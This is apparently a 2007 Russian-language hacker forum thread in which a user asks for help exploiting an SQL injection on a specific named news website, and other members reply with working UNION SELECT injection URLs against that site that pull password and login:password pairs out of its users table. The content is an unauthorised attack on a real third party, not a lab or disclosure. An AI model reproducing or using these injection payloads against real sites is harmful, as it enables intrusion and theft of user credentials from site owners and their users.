sql-inj запросы

muse · 20 Apr 2007

есть сайт с уязвимым параметром page.php?id=35167

подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом
прав на запросы к msql. нету
прошу помощи у профов

limpompo · 20 Apr 2007

поищи таблицы user user admin admins members и так далеее

Кароче займись подбором Таблиц и колонок....

muse · 20 Apr 2007

вы непоняли вопроса.
я немогу вытащить оттуда инфу
например есть таблица users и в ней есть параметр id
но запрос union select 1,id from users ничего не выдает...

guest3297 · 20 Apr 2007

Линк дай.
Млять какой же народ пошел.

muse · 20 Apr 2007

http://daily.com.ua/analytics/page.php?id=35167

Constantine · 20 Apr 2007

Помойму иньекция на этот сайт проведена кем то из наших, во всяком случае в антибояне линк есть

guest3297 · 20 Apr 2007

http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,2/*

c411k · 20 Apr 2007

[ cash ] said:

http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
Click to expand...

втф? либо я слепой, либо лыжи не едут, но вывода в упор не вижу.

muse said:

подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом
Click to expand...

http://daily.com.ua/analytics/page.php?id=3516+and(1=-1)+union+select+concat(login,char(95),password),6+from+users/*

sql-inj запросы

muse Elder - Старейшина

limpompo Новичок

muse Elder - Старейшина

guest3297 Banned

muse Elder - Старейшина

Constantine Elder - Старейшина

guest3297 Banned

c411k Members of Antichat

Useful Searches

sql-inj запросы

muse Elder - Старейшина

limpompo Новичок

muse Elder - Старейшина

guest3297 Banned

muse Elder - Старейшина

Constantine Elder - Старейшина

guest3297 Banned

c411k Members of Antichat